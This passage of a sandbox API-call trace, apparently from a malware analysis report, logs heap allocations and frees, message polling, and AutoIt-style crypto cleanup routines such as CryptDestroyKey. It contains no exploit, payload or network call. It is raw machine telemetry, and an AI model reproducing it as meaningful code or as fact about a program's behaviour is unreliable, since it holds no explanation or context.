0x2e50ef0 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0220.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0220.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0220.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0220.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0220.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0220.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0220.689] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0220.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0220.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0220.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0220.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0220.689] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0220.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0220.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0220.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0220.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0220.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0220.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0220.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0220.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0220.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0220.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0220.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0220.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0220.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0220.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0220.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0220.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0220.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0220.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0220.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0220.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0220.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0220.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0220.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0220.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0220.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0220.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0220.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0220.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0220.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0220.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0220.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0220.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0220.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0220.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0220.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0220.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0220.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0220.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0220.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0220.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0220.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0220.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e511a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0220.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0220.791] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0220.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0220.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0220.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0220.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0220.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0220.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0220.791] CryptDestroyKey (hKey=0xa87250) returned 1 [0220.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0220.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0220.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0220.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0220.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0220.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0220.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0220.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0220.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0220.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0220.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0220.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0220.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0220.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0220.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0220.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0220.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0220.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0220.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0220.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0220.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0220.793] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0220.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0220.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0220.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0220.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0220.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0220.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0220.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0220.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0220.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0220.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0220.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0220.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0220.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0220.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0220.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0220.794] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0220.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0220.794] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0220.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0220.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0220.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0220.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0220.794] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0220.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0220.794] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0220.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0220.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0220.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0220.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0220.795] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0220.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0220.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0220.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0220.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0220.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0220.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0220.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0220.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0220.796] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.796] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0220.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0220.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0220.796] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0220.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0220.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0220.796] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0220.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0220.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0220.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0220.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0220.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0220.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0220.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0220.797] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0220.797] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0220.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0220.797] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0220.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0220.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0220.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0220.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0220.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0220.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0220.798] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0220.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0220.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0220.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0220.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0220.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0220.798] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0220.798] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0220.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0220.798] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: 